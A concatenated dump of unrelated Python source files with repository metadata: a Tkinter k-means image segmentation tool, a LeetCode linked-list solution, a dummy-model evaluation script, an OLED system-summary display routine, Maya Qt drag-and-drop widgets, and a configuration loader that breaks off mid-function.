0c1bc72fb186c51f863c90d91abb4cadc8499c3a | 13,239 | py | Python | parent/venv/apply_k_means_window.py | lugidm/FusariumUNet | 853dc39848b2570a73504e1db57e3ccd26764573 | [
"Unlicense"
] | null | null | null | parent/venv/apply_k_means_window.py | lugidm/FusariumUNet | 853dc39848b2570a73504e1db57e3ccd26764573 | [
"Unlicense"
] | null | null | null | parent/venv/apply_k_means_window.py | lugidm/FusariumUNet | 853dc39848b2570a73504e1db57e3ccd26764573 | [
"Unlicense"
] | null | null | null | from tkinter import filedialog
import tkinter as tk
from tkinter import ttk
from tkinter import messagebox
import warnings
import math
from point2d import Point2D
from PIL import Image, ImageTk
import os
import errno
from message_box import *
import shutil
import cv2
import numpy as np
import sys as sys
import re as re
from sklearn.cluster import KMeans
from scipy.spatial import distance_matrix
from constants import *
from pyramid_canvas import CanvasImage
initial_search_directory = "."
kernel_size = KERNEL_SIZE
def path_leaf(path):
""" head, tail = os.path.split(path)
return tail or os.path.basename(head)"""
return re.sub('[^A-Za-z0-9]+', '_', path)
class ApplyKMeans:
global kernel_size
def __init__(self, master):
self.root = master
self.root.geometry('900x600')
self.root.columnconfigure(0, weight=1)
self.root.rowconfigure(0, weight=1)
self.k_means_centers_path = os.path.join(K_MEANS_CENTERS, K_MEANS_CENTERS_CSV)
self.filename = ""
self.original_img = None
self.segmented_img = None
self.labels = None
self.nr_centers_val = K_MEANS_NR_CENTERS
self.nr_iterations_val = K_MEANS_NR_ITERATIONS
self.resulting_img_path = None
self.initial_directory = "."
self.pre_centers = None
self.center_names = ['diseased', 'healthy', 'soil', 'rest']
self.displayed_centers = []
self.button_fr = tk.Frame(master)
self.button_fr.grid_rowconfigure(1, weight=1)
self.button_fr.grid_rowconfigure(0, weight=1)
self.button_fr.grid_columnconfigure(0, weight=1)
self.button_fr.grid_columnconfigure(1, weight=1)
self.button_fr.grid_columnconfigure(2, weight=1)
self.original = tk.BooleanVar()
self.ch0 = tk.BooleanVar()
self.ch1 = tk.BooleanVar()
self.ch2 = tk.BooleanVar()
self.ch3 = tk.BooleanVar()
self.ch4 = tk.BooleanVar()
self.ch5 = tk.BooleanVar()
self.ch6 = tk.BooleanVar()
self.ch7 = tk.BooleanVar()
self.ch8 = tk.BooleanVar()
self.ch9 = tk.BooleanVar()
self.wanted_clusters = [self.ch0, self.ch1, self.ch2, self.ch3, self.ch4, self.ch5, self.ch6, self.ch7,
self.ch8, self.ch9]
self.pr0 = tk.StringVar()
self.pr1 = tk.StringVar()
self.pr2 = tk.StringVar()
self.pr3 = tk.StringVar()
self.pr4 = tk.StringVar()
self.pr5 = tk.StringVar()
self.pr6 = tk.StringVar()
self.pr7 = tk.StringVar()
self.pr8 = tk.StringVar()
self.pr9 = tk.StringVar()
self.percentages = [self.pr0, self.pr1, self.pr2, self.pr3, self.pr4, self.pr5, self.pr6, self.pr7,
self.pr8, self.pr9]
self.search_bt = tk.Button(self.button_fr, text="Search Image", command=self.search)
self.search_bt.grid(row=0, column=1)
self.calculate_k_means_bt = tk.Button(self.button_fr, text="(Re)Run K-Means", command=self.calculate,
fg='green')
self.calculate_k_means_bt.grid(row=0, column=0)
self.quit_bt = tk.Button(self.button_fr, text="QUIT", fg="red", command=self.root.destroy)
self.quit_bt.grid(row=0, column=2)
self.img_name_entry = tk.Entry(self.button_fr)
self.img_name_entry.grid(row=1, columnspan=3, pady=2, sticky='EW')
self.img_name_entry.insert(0, self.filename)
self.button_fr.pack()
self.frame_canvas = tk.Frame(self.root, bg='black', relief='sunken', bd=1)
self.frame_canvas.rowconfigure(1, weight=1)
self.frame_canvas.columnconfigure(1, weight=1)
self.canvas = None
self.frame_canvas.pack(fill=tk.BOTH, expand=1, side='left')
self.all_options_fr = tk.Frame(self.root, relief='sunken', bd=1)
self.all_options_fr.rowconfigure(0, weight=1)
self.all_options_fr.pack(expand=1, side='right')
self.original_or_cluster_fr = tk.Frame(self.all_options_fr, relief='sunken', bd=1)
self.original_or_cluster_fr.grid(row=1, column=0)
self.original_rd = tk.Radiobutton(self.original_or_cluster_fr, variable=self.original, value=True,
text="original color", command=self.repaint_clusters)
self.original_rd.grid(row=0, column=0)
self.cluster_rd = tk.Radiobutton(self.original_or_cluster_fr, variable=self.original, value=False,
text="color of cluster centers", command=self.repaint_clusters)
self.cluster_rd.grid(row=0, column=1)
self.all_scales_fr = tk.Frame(self.all_options_fr, relief='sunken', bd=1)
self.all_scales_fr.rowconfigure(0, weight=1)
self.all_scales_fr.grid(row=0, column=0, sticky='E')
self.nr_centers_description_lb = tk.Label(self.all_scales_fr, text="#Cluster-Centers, \n4-5 is recommended",
relief='sunken')
self.nr_centers_description_lb.grid(row=0, column=0)
self.nr_centers_sc = tk.Scale(self.all_scales_fr, from_=2, to=10, resolution=1, name="nr_centers_scale")
self.nr_centers_sc.set(K_MEANS_NR_CENTERS)
self.nr_centers_sc.bind("<ButtonRelease-1>", self._update_value)
self.nr_centers_sc.grid(row=1, column=0)
self.nr_iterations_lb = tk.Label(self.all_scales_fr, text="#Iterations", relief='sunken')
self.nr_iterations_lb.grid(row=0, column=1)
self.nr_iterations_sc = tk.Scale(self.all_scales_fr, from_=1, to=20, resolution=1, name="nr_iterations_scale")
self.nr_iterations_sc.set(K_MEANS_NR_ITERATIONS)
self.nr_iterations_sc.bind("<ButtonRelease-1>", self._update_value)
self.nr_iterations_sc.grid(row=1, column=1)
self.check_fr = tk.Frame(self.all_options_fr, relief='sunken', bd=1)
self.check_fr.rowconfigure(0, weight=1)
self.check_fr.grid(row=2, column=0)
self.check_lb = tk.Label(self.check_fr, relief='sunken', text='which clusters do you want to display?')
self.check_lb.grid(row=0, column=0, columnspan=2)
self.check_buttons = []
self.percentages_labels = []
for i in range(int(self.nr_centers_sc['to'])):
self.percentages_labels.append(tk.Entry(self.check_fr, textvariable=self.percentages[i]))
self.percentages[i].set("%")
self.check_buttons.append(tk.Checkbutton(self.check_fr, text=str(i + 1), variable=self.wanted_clusters[i],
command=self.repaint_clusters))
if i < 4:
self.check_buttons[-1].configure(text=self.center_names[i])
for i in range(self.nr_centers_val):
self.check_buttons[i].grid(column=0, row=i + 1)
self.percentages_labels[i].grid(column=1, row=i + 1)
"""self.save_img_bt = tk.Button(self.all_options_fr, text="save current picture", command=self.save)
self.save_img_bt.grid(row=2)
self.all_options_fr.pack()"""
def search(self):
global initial_search_directory
filename = filedialog.askopenfilename(initialdir=initial_search_directory, title="Select Image",
filetypes=(("jpeg files", ("*.jpg", "*JPG", "*jpeg", "*JPEG")),
("all files", "*.*")))
if filename is not None and type(filename) == str and filename != "":
self.initial_directory = os.path.split(filename)[0]
self.img_name_entry.delete(0, tk.END)
self.img_name_entry.insert(0, filename)
self.filename = filename
def _update_value(self, event):
old_val = self.nr_centers_val
self.nr_centers_val = self.nr_centers_sc.get()
self.nr_iterations_val = self.nr_iterations_sc.get()
if old_val != self.nr_centers_val:
if old_val > self.nr_centers_val:
for j in range(old_val - 1, self.nr_centers_val - 1, -1):
self.check_buttons[j].grid_remove()
self.wanted_clusters[j].set(False)
self.percentages_labels[j].grid_remove()
for i in range(self.nr_centers_val):
self.check_buttons[i].grid(column=0, row=i + 1)
self.percentages_labels[i].grid(column=1, row=i+1)
def repaint_clusters(self):
total_amount = 0
values = np.zeros(10)
if self.canvas is not None:
self.canvas.destroy()
self.canvas = None
if self.segmented_img is not None and self.labels is not None:
if self.original.get():
new_segmented_image = np.zeros(self.segmented_img.shape, dtype=self.original_img.dtype)
else:
new_segmented_image = np.copy(self.segmented_img)
for i in range(0, len(self.wanted_clusters)):
if self.wanted_clusters[i].get() == False:
if not self.original.get():
new_segmented_image[self.labels == i] = [255, 255, 255]
self.percentages[i].set("0%")
else:
if self.original.get():
new_segmented_image[self.labels == i] = [1, 1, 1]
values[i] = np.count_nonzero(self.labels == i)
total_amount += values[i]
for i in range(0, len(self.percentages)):
if values[i] != 0:
self.percentages[i].set(str("%.2f" % ((values[i] / total_amount) * 100)) + "%")
if self.original.get():
new_segmented_image = new_segmented_image.reshape(self.original_img.shape) * self.original_img
cv2.imwrite(self.resulting_img_path, new_segmented_image.reshape(self.original_img.shape))
if self.canvas is not None:
self.canvas.destroy()
self.canvas = None
self.canvas = CanvasImage(self.frame_canvas, self.resulting_img_path, self)
self.canvas.grid(columnspan=2, rowspan=2)
def calculate(self):
global initial_search_directory
if not os.path.exists(K_MEANS_RESULTS_PATH):
os.mkdir(K_MEANS_RESULTS_PATH)
if not type(self.filename) == str or not os.path.exists(self.filename):
messagebox.showinfo("no file chosen!", "choose a file with search")
return
if self.canvas is not None:
self.canvas.destroy()
self.canvas = None
if not os.path.exists(self.k_means_centers_path):
messagebox.showinfo("There seems to be no cluster-centers in " + self.k_means_centers_path +
". The centers will be set to default-values")
self.pre_centers = None
else:
self.pre_centers = np.genfromtxt(self.k_means_centers_path, delimiter=',').astype(int)
self.resulting_img_path, self.original_img, self.segmented_img, self.labels = apply_k_means(self.filename,
self.nr_centers_val,
self.nr_iterations_val,
self.pre_centers)
self.repaint_clusters()
def apply_k_means(filename, nr_centers=K_MEANS_NR_CENTERS, nr_iterations=K_MEANS_NR_ITERATIONS, pre_centers=None,
img=None):
if img is None: # the image needs to be loaded first
img = cv2.imread(filename, cv2.IMREAD_COLOR)
    # k_means_via_sklearn returns per-pixel cluster labels (not the centers),
    # so name the third return value accordingly.
    segmented, colored, labels = k_means_via_sklearn(img, nr_centers, nr_iterations, pre_centers)
    path_to_segmented = os.path.join(K_MEANS_RESULTS_PATH, path_leaf(filename) + ".bmp")
    cv2.imwrite(path_to_segmented, segmented.reshape(img.shape))
    return path_to_segmented, img, segmented, labels
def k_means_via_sklearn(img, nr_centers, nr_iterations, pre_centers):
image = img
pixel_values = image.reshape((-1, 3))
pixel_values = np.uint8(pixel_values)
if pre_centers is None:
messagebox.showinfo("Info", "There seems to be no previously calculated cluster-centers")
pre_centers = np.array([[54, 63, 44],
[95, 112, 85],
[141, 154, 115],
[199, 202, 173]], np.uint8)
pre_centers = np.copy(pre_centers) # make sure the initially read file isnt changed
if nr_centers < 4:
pre_centers = np.delete(pre_centers, range(nr_centers - 1, 3), axis=0)
elif nr_centers > 4:
pre_centers = np.append(pre_centers, np.zeros(shape=(nr_centers - 4, 3)), axis=0)
km = KMeans(n_clusters=nr_centers, init=pre_centers, n_init=1, max_iter=nr_iterations).fit(pixel_values)
centers = km.cluster_centers_
labels = km.labels_
segmented_image = np.uint8(centers[labels.flatten()])
colored = np.zeros(segmented_image.shape, dtype=img.dtype)
return segmented_image, colored, labels
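# Headless usage sketch (bypasses the Tk window; the image path is
# illustrative):
# path, img, segmented, labels = apply_k_means("field_photo.jpg", nr_centers=4)
# print(path)  # segmented .bmp written under K_MEANS_RESULTS_PATH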
| 47.622302 | 123 | 0.613339 | 1,759 | 13,239 | 4.412166 | 0.169983 | 0.03363 | 0.028476 | 0.018554 | 0.362067 | 0.250225 | 0.201392 | 0.15565 | 0.113645 | 0.091998 | 0 | 0.022576 | 0.273963 | 13,239 | 277 | 124 | 47.794224 | 0.784852 | 0.011557 | 0 | 0.108787 | 0 | 0 | 0.046308 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.033473 | false | 0 | 0.083682 | 0 | 0.138075 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0c1c72918ad94a6a9926fcf4dc5a3feb761e2424 | 823 | py | Python | 400-499/430.py | linyk9/leetcode | eaaadead32cc9d3884543f4ed832bb3cb5aa68e6 | [
"MIT"
] | null | null | null | 400-499/430.py | linyk9/leetcode | eaaadead32cc9d3884543f4ed832bb3cb5aa68e6 | [
"MIT"
] | null | null | null | 400-499/430.py | linyk9/leetcode | eaaadead32cc9d3884543f4ed832bb3cb5aa68e6 | [
"MIT"
] | null | null | null | """
# Definition for a Node.
class Node:
def __init__(self, val, prev, next, child):
self.val = val
self.prev = prev
self.next = next
self.child = child
"""
class Solution:
def flatten(self, head: 'Node') -> 'Node':
newHead = head
while newHead:
if newHead.child:
h = self.flatten(newHead.child)
newHead.child = None
temp = newHead.next
newHead.next = h
h.prev = newHead
while h.next:
h = h.next
h.next = temp
                # Guard against temp being None at the tail of the list.
                if temp:
                    temp.prev = h
newHead = temp
else:
newHead = newHead.next
return head
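# The approach: whenever a node has a child, recursively flatten the child
# list, splice it between the node and its old successor, then walk to the
# spliced tail to reconnect next/prev. Each splice walks the flattened
# child list, so the worst case is O(n * d) time for nesting depth d.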
| 25.71875 | 47 | 0.426488 | 80 | 823 | 4.3375 | 0.325 | 0.103746 | 0.034582 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.492102 | 823 | 31 | 48 | 26.548387 | 0.830144 | 0.223572 | 0 | 0 | 0 | 0 | 0.012678 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.047619 | false | 0.047619 | 0 | 0 | 0.142857 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0c1c7aafc21e81bf14864b00d981fadaa0c98a30 | 1,443 | py | Python | scripts/evaluation/eval_dummy.py | SteshinSS/serotonin-affinity | accc2046b51259254513b0180c382ca431bb1c24 | [
"MIT"
] | null | null | null | scripts/evaluation/eval_dummy.py | SteshinSS/serotonin-affinity | accc2046b51259254513b0180c382ca431bb1c24 | [
"MIT"
] | null | null | null | scripts/evaluation/eval_dummy.py | SteshinSS/serotonin-affinity | accc2046b51259254513b0180c382ca431bb1c24 | [
"MIT"
] | null | null | null | import argparse
import json
import logging
from pathlib import Path
import numpy as np
from sklearn.metrics import accuracy_score, f1_score, roc_auc_score
logging.basicConfig(level=logging.INFO)
log = logging.getLogger("Eval-Dummy")
def get_parser():
parser = argparse.ArgumentParser(description="Evaluate dummy model which predicts 0 for all molecules.")
parser.add_argument("dataset_path", type=str, help="Path to dataset to evaluate for")
parser.add_argument(
"output_path", type=str, help="Path to save the evaluation results"
)
return parser
def evaluate(X: np.ndarray, y: np.ndarray):
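    """Score the constant-zero baseline against the labels y.
    For an all-zero predictor these metrics are fully determined: accuracy
    equals the fraction of negative samples, ROC AUC is 0.5 (every score
    ties), and F1 is 0 (no positive predictions), so the result is a floor
    any real model should beat.
    """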
y_pred = np.zeros_like(y) # predict constant 0
accuracy = accuracy_score(y, y_pred)
log.info(f"Accuracy: {accuracy}")
roc_auc = roc_auc_score(y, y_pred)
log.info(f"ROC AUC: {roc_auc}")
f1 = f1_score(y, y_pred)
log.info(f"F1-Score: {f1}")
result = {
"Accuracy": accuracy,
"ROC_AUC": roc_auc,
"F1-Score": f1,
}
return result
if __name__ == "__main__":
parser = get_parser()
args = parser.parse_args()
log.info(f"Evaluating dummy model on {args.dataset_path} dataset...")
dataset = np.load(args.dataset_path)
result = evaluate(dataset['X'], dataset['y'])
output_path = Path(args.output_path).parent
output_path.mkdir(parents=True, exist_ok=True)
with open(args.output_path, "w") as f:
json.dump(result, f)
| 25.767857 | 108 | 0.68122 | 208 | 1,443 | 4.538462 | 0.375 | 0.044492 | 0.033898 | 0.034958 | 0.181144 | 0.164195 | 0.060381 | 0 | 0 | 0 | 0 | 0.007765 | 0.196812 | 1,443 | 55 | 109 | 26.236364 | 0.80673 | 0.012474 | 0 | 0 | 0 | 0 | 0.208714 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.051282 | false | 0 | 0.153846 | 0 | 0.25641 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0c20ab47d56935f9a39ecd711da5b2ef5c402d78 | 1,893 | py | Python | rpimonitor/display/summary.py | rob-blackbourn/rpiteenydisplay | 9c2a418619805d01fc9d58980a5351fe718bf7f3 | [
"MIT"
] | 2 | 2019-05-13T19:40:54.000Z | 2020-01-09T03:46:55.000Z | rpimonitor/display/summary.py | rob-blackbourn/rpiteenydisplay | 9c2a418619805d01fc9d58980a5351fe718bf7f3 | [
"MIT"
] | null | null | null | rpimonitor/display/summary.py | rob-blackbourn/rpiteenydisplay | 9c2a418619805d01fc9d58980a5351fe718bf7f3 | [
"MIT"
] | null | null | null | """Draw summary"""
from luma.core.render import canvas
def draw_summary_text(device, font, cpu_usage, mem_usage, cpu_temp):
"""Draw the summary as text"""
cpu_usage_text = f"{cpu_usage:.0%}"
mem_usage_text = f"{mem_usage:.0%}"
cpu_temp_text = f"{cpu_temp:.0f}\u2103"
with canvas(device) as draw:
hundred_pct_width = draw.textsize("100%", font=font)[0]
hundred_degc_width = draw.textsize("100\u2103", font=font)[0]
cpu_title_width = draw.textsize("CPU", font=font)[0]
mem_title_width = draw.textsize("Mem", font=font)[0]
temp_title_width = draw.textsize("Temp", font=font)[0]
cpu_width = max(cpu_title_width, hundred_pct_width)
mem_width = max(mem_title_width, hundred_pct_width)
temp_width = max(temp_title_width, hundred_degc_width)
cpu_usage_width = draw.textsize(cpu_usage_text, font=font)[0]
mem_usage_width = draw.textsize(mem_usage_text, font=font)[0]
cpu_temp_width = draw.textsize(cpu_temp_text, font=font)[0]
cpu_title_pad = cpu_width - cpu_title_width
cpu_usage_pad = cpu_width - cpu_usage_width
mem_title_pad = mem_width - mem_title_width
mem_usage_pad = mem_width - mem_usage_width
temp_title_pad = temp_width - temp_title_width
cpu_temp_pad = temp_width - cpu_temp_width
x0, x1, x2 = 0, 45, 90
y0, y1 = 0, 20
draw.text((x0 + cpu_title_pad, y0), "CPU", fill="white", font=font)
draw.text((x0 + cpu_usage_pad, y1), cpu_usage_text, fill="white", font=font)
draw.text((x1 + mem_title_pad, y0), "Mem", fill="white", font=font)
draw.text((x1 + mem_usage_pad, y1), mem_usage_text, fill="white", font=font)
draw.text((x2 + temp_title_pad, y0), "Temp", fill="white", font=font)
draw.text((x2 + cpu_temp_pad, y1), cpu_temp_text, fill="white", font=font)
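# Example wiring, assuming an SSD1306 OLED on I2C (the device, port and
# address below are illustrative; any luma.core device should work):
# from luma.oled.device import ssd1306
# from luma.core.interface.serial import i2c
# from PIL import ImageFont
# device = ssd1306(i2c(port=1, address=0x3C))
# draw_summary_text(device, ImageFont.load_default(), 0.42, 0.61, 48.0)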
| 45.071429 | 84 | 0.661912 | 294 | 1,893 | 3.92517 | 0.142857 | 0.097054 | 0.117851 | 0.088388 | 0.264298 | 0.136049 | 0.114385 | 0.089255 | 0 | 0 | 0 | 0.033356 | 0.208135 | 1,893 | 41 | 85 | 46.170732 | 0.736491 | 0.019546 | 0 | 0 | 0 | 0 | 0.061247 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.032258 | false | 0 | 0.032258 | 0 | 0.064516 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0c20c070d2359e6105031b0de692ea7e35f6d101 | 8,701 | py | Python | release/scripts/mgear/core/widgets.py | tk-aria/mgear4 | eac1af6882dd7dc4cec1a4b71854040d376704ce | [
"MIT"
] | 72 | 2020-09-28T20:00:59.000Z | 2022-03-25T14:35:14.000Z | release/scripts/mgear/core/widgets.py | Mikfr83/mgear4 | 2fa28080027f1004e8e0139ccf93f7ec2448b1fd | [
"MIT"
] | 101 | 2020-09-28T19:53:53.000Z | 2022-03-31T01:44:41.000Z | release/scripts/mgear/core/widgets.py | Mikfr83/mgear4 | 2fa28080027f1004e8e0139ccf93f7ec2448b1fd | [
"MIT"
] | 32 | 2020-10-09T10:49:45.000Z | 2022-03-31T08:27:37.000Z | """mGear Qt custom widgets"""
from mgear.vendor.Qt import QtCore, QtWidgets, QtGui
import maya.OpenMaya as api
#################################################
# CUSTOM WIDGETS
#################################################
class TableWidgetDragRows(QtWidgets.QTableWidget):
"""qTableWidget with drag and drop functionality"""
def __init__(self, *args, **kwargs):
super(TableWidgetDragRows, self).__init__(*args, **kwargs)
self.setDragEnabled(True)
self.setAcceptDrops(True)
self.viewport().setAcceptDrops(True)
self.setDragDropOverwriteMode(False)
self.setDropIndicatorShown(True)
self.setSelectionMode(QtWidgets.QAbstractItemView.ExtendedSelection)
self.setSelectionBehavior(QtWidgets.QAbstractItemView.SelectRows)
self.setDragDropMode(QtWidgets.QAbstractItemView.InternalMove)
def dropEvent(self, event):
if not event.isAccepted() and event.source() == self:
drop_row = self.drop_on(event)
rows = sorted(set(item.row() for item in self.selectedItems()))
rows_to_move = [[QtWidgets.QTableWidgetItem(
self.item(row_index, column_index))
for column_index in range(self.columnCount())]
for row_index in rows]
for row_index in reversed(rows):
self.removeRow(row_index)
if row_index < drop_row:
drop_row -= 1
for row_index, data in enumerate(rows_to_move):
row_index += drop_row
self.insertRow(row_index)
for column_index, column_data in enumerate(data):
self.setItem(row_index, column_index, column_data)
event.accept()
for row_index in range(len(rows_to_move)):
for column_index in range(self.columnCount()):
self.item(drop_row + row_index,
column_index).setSelected(True)
def drop_on(self, event):
index = self.indexAt(event.pos())
if not index.isValid():
return self.rowCount()
return index.row() + 1 if self.is_below(event.pos(),
index) else index.row()
def is_below(self, pos, index):
rect = self.visualRect(index)
margin = 2
if pos.y() - rect.top() < margin:
return False
elif rect.bottom() - pos.y() < margin:
return True
return rect.contains(pos, True) \
and not (int(self.model().flags(index))
& QtCore.Qt.ItemIsDropEnabled) \
and pos.y() >= rect.center().y()
def getSelectedRowsFast(self):
selRows = []
for item in self.selectedItems():
if item.row() not in selRows:
selRows.append(item.row())
return selRows
def droppingOnItself(self, event, index):
dropAction = event.dropAction()
if self.dragDropMode() == QtWidgets.QAbstractItemView.InternalMove:
dropAction = QtCore.Qt.MoveAction
if (event.source() == self
and event.possibleActions() & QtCore.Qt.MoveAction
and dropAction == QtCore.Qt.MoveAction):
selectedIndexes = self.selectedIndexes()
child = index
while child.isValid() and child != self.rootIndex():
if child in selectedIndexes:
return True
child = child.parent()
return False
def dropOn(self, event):
if event.isAccepted():
return False, None, None, None
index = QtWidgets.QModelIndex()
row = -1
col = -1
if self.viewport().rect().contains(event.pos()):
index = self.indexAt(event.pos())
if (not index.isValid()
or not self.visualRect(index).contains(event.pos())):
index = self.rootIndex()
if self.model().supportedDropActions() & event.dropAction():
if index != self.rootIndex():
dropIndicatorPosition = self.position(event.pos(),
self.visualRect(index),
index)
qabw = QtWidgets.QAbstractItemView
if dropIndicatorPosition == qabw.AboveItem:
row = index.row()
col = index.column()
elif dropIndicatorPosition == qabw.BelowItem:
row = index.row() + 1
col = index.column()
else:
row = index.row()
col = index.column()
if not self.droppingOnItself(event, index):
return True, row, col, index
return False, None, None, None
def position(self, pos, rect, index):
r = QtWidgets.QAbstractItemView.OnViewport
margin = 5
if pos.y() - rect.top() < margin:
r = QtWidgets.QAbstractItemView.AboveItem
elif rect.bottom() - pos.y() < margin:
r = QtWidgets.QAbstractItemView.BelowItem
elif rect.contains(pos, True):
r = QtWidgets.QAbstractItemView.OnItem
if (r == QtWidgets.QAbstractItemView.OnItem
and not (self.model().flags(index)
& QtCore.Qt.ItemIsDropEnabled)):
if pos.y() < rect.center().y():
r = QtWidgets.QAbstractItemView.AboveItem
else:
r = QtWidgets.QAbstractItemView.BelowItem
return r
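# Minimal usage sketch (run inside an existing Qt application; the values
# are illustrative, not part of the original module):
# table = TableWidgetDragRows(3, 2)
# for r in range(3):
#     for c in range(2):
#         table.setItem(r, c, QtWidgets.QTableWidgetItem("cell %d,%d" % (r, c)))
# table.show()  # rows can now be reordered by dragging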
######################################
# drag and drop QListView to Maya view
######################################
def selectFromScreenApi(x, y, x_rect=None, y_rect=None):
"""Find the object under the cursor on Maya view
found here: http://nathanhorne.com/maya-python-selectfromscreen/
Thanks Nathan!
Args:
x (int): rectable selection start x
y (int): rectagle selection start y
x_rect (int, optional): rectable selection end x
y_rect (int, optional): rectagle selection end y
Returns:
list of str: Name of the objects under the cursor
"""
# get current selection
sel = api.MSelectionList()
api.MGlobal.getActiveSelectionList(sel)
# select from screen
if x_rect is not None and y_rect is not None:
api.MGlobal.selectFromScreen(
x, y, x_rect, y_rect, api.MGlobal.kReplaceList)
else:
api.MGlobal.selectFromScreen(x, y, api.MGlobal.kReplaceList)
objects = api.MSelectionList()
api.MGlobal.getActiveSelectionList(objects)
# restore selection
api.MGlobal.setActiveSelectionList(sel, api.MGlobal.kReplaceList)
# return the objects as strings
fromScreen = []
objects.getSelectionStrings(fromScreen)
return fromScreen
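# Example (coordinates are illustrative; requires a running Maya session):
# names = selectFromScreenApi(200, 150)            # single-point pick
# names = selectFromScreenApi(50, 50, 400, 300)    # rectangle pick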
class DragQListView(QtWidgets.QListView):
"""QListView with basic drop functionality
Attributes:
exp (int): Extend the mouse position to a rectable
theAction (func): function triggered when drop
"""
def __init__(self, parent):
super(DragQListView, self).__init__(parent)
self.setDragEnabled(True)
self.setAcceptDrops(False)
self.setDropIndicatorShown(True)
self.setAlternatingRowColors(True)
self.setEditTriggers(QtWidgets.QAbstractItemView.NoEditTriggers)
self.setDefaultDropAction(QtCore.Qt.CopyAction)
self.exp = 3
self.ignore_self = True
def mouseMoveEvent(self, event):
mimeData = QtCore.QMimeData()
mimeData.setText('%d,%d' % (event.x(), event.y()))
drag = QtGui.QDrag(self)
drag.setMimeData(mimeData)
drag.setHotSpot(event.pos())
dropAction = drag.start(QtCore.Qt.MoveAction)
if not dropAction == QtCore.Qt.MoveAction:
pos = QtGui.QCursor.pos()
widget = QtWidgets.QApplication.widgetAt(pos)
if self.ignore_self and (
widget is self
or widget.objectName() == "qt_scrollarea_viewport"):
return
relpos = widget.mapFromGlobal(pos)
# need to invert Y axis
invY = widget.frameSize().height() - relpos.y()
sel = selectFromScreenApi(relpos.x() - self.exp,
invY - self.exp,
relpos.x() + self.exp,
invY + self.exp)
self.doAction(sel)
def setAction(self, action):
self.theAction = action
def doAction(self, sel):
self.theAction(sel)
| 35.514286 | 77 | 0.565682 | 864 | 8,701 | 5.625 | 0.24537 | 0.023045 | 0.038889 | 0.011728 | 0.186626 | 0.088066 | 0.060082 | 0.016872 | 0.016872 | 0 | 0 | 0.001353 | 0.320308 | 8,701 | 244 | 78 | 35.659836 | 0.820426 | 0.089185 | 0 | 0.166667 | 0 | 0 | 0.003522 | 0.00287 | 0 | 0 | 0 | 0 | 0 | 1 | 0.077381 | false | 0 | 0.011905 | 0 | 0.184524 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0c20ef34dbe36314044cb7fcf862111c08ab5497 | 2,989 | py | Python | configuration.py | aurphillus/Certificate-Edit | d4c1e534dc4abbfcaf77262aab5283a72bf9a63e | [
"MIT"
] | null | null | null | configuration.py | aurphillus/Certificate-Edit | d4c1e534dc4abbfcaf77262aab5283a72bf9a63e | [
"MIT"
] | null | null | null | configuration.py | aurphillus/Certificate-Edit | d4c1e534dc4abbfcaf77262aab5283a72bf9a63e | [
"MIT"
] | null | null | null | import configparser
import os
def create_config():
default_path = os.getcwd()
config = configparser.ConfigParser()
config['PATH'] = {
"parentdirectory": default_path,
}
config ['EXTENSIONS'] = {
"acceptedextensions": 'jpeg,png,jpg'
}
config['DIRECTORY'] = {
"input": "injest",
"output": "output",
"log": "logs",
"default": "default",
}
config['IMAGE'] = {
'basewidth': 1276,
'defaultbackground': 'transparent.png',
'defaultbackgroundlink':'https://pasteboard.co/JiXOlCH.png'
}
config['LOG'] = {
'filename': 'log.txt'
}
with open("config.ini","w") as configfile:
config.write(configfile)
def load_config():
if os.path.exists("config.ini"):
config = configparser.ConfigParser()
config.read("config.ini")
# Checking config
try:
            if (config['PATH']['parentdirectory'] and config['EXTENSIONS']['acceptedextensions']
                    and config['DIRECTORY']['input'] and config['DIRECTORY']['output']
                    and config['DIRECTORY']['log'] and config['IMAGE']['basewidth']
                    and config['IMAGE']['defaultbackground'] and config['DIRECTORY']['default']
                    and config['IMAGE']['defaultbackgroundlink'] and config['LOG']['filename']):
config={
'parentdirectory': config['PATH']['parentdirectory'],
'extensions': config['EXTENSIONS']['acceptedextensions'].split(','),
'input_directory': config['DIRECTORY']['input'],
'output_directory': config['DIRECTORY']['output'],
'logs_directory': config['DIRECTORY']['log'],
'basewidth': config['IMAGE']['basewidth'],
'transparentbackground': config['IMAGE']['defaultbackground'],
'default_directory': config['DIRECTORY']['default'],
'defaultbackgroundlink': config['IMAGE']['defaultbackgroundlink'],
'logfile': config['LOG']['filename']
}
return config
else:
print(f"#. Problem with config file.")
print(f"#. Resetting config file.")
if os.path.exists("config.ini"):
os.remove("config.ini")
print(f"#. Generating new default config file")
create_config()
                return load_config()
except Exception as e:
print(f"#. Problem with config file.")
print(f"#. Resetting config file.")
if os.path.exists("config.ini"):
